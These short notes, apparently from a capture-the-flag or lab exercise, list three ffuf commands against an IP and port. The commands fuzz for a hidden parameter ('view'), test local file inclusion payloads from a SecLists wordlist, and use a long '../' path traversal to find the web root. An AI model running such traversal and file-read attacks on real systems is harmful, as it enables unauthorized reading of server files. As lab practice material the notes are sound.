ffuf -w SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://94.237.54.42:51515/index.php?FUZZ=key' -fs 2309 -ic -c -t 200 to find ‘view’

ffuf -w SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://94.237.54.42:51515/index.php?view=FUZZ' -fs 1935 -ic -c -t 200

to find how can bypass to Read FILE

ffuf -w SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://94.237.54.42:51515/index.php?view=../../../../../../../../../../../../../../../../../../../../../FUZZ/index.php' -fs 1935 -ic -c -t 200